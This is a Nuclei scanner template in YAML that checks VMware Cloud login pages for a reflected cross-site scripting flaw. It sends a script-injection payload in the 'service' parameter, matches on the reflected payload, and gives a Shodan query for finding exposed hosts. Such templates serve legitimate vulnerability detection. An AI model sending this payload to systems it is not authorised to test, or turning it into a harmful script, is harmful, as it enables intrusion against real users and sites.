40 lines
1.1 KiB
YAML
40 lines
1.1 KiB
YAML
id: vmware-cloud-xss
|
|
|
|
info:
|
|
name: VMWare Cloud - Cross Site Scripting
|
|
author: tess
|
|
severity: medium
|
|
description: VMWare Cloud is vulnerable to Reflected Cross Site Scripting vulnerability.
|
|
classification:
|
|
cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: vmware
|
|
product: cloud_foundation
|
|
shodan-query: title:"Vmware Cloud"
|
|
tags: vmware,xss,cloud
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/login/?redirectTo=/tenant/e&service=</script><script>alert(document.domain)</script>'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '</script><script>alert(document.domain)</script>'
|
|
- 'let tokens = "'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'text/html'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100c2d1d4d15d6aec67f75e293d9256116919e764c41bfb231977ac333d920c43d00220740a87d90d50ae8fda9e95e2a5c25997d3000f17cf0911e40fd6fa322352b6f0:922c64590222798bb761d5b6d8e72950 |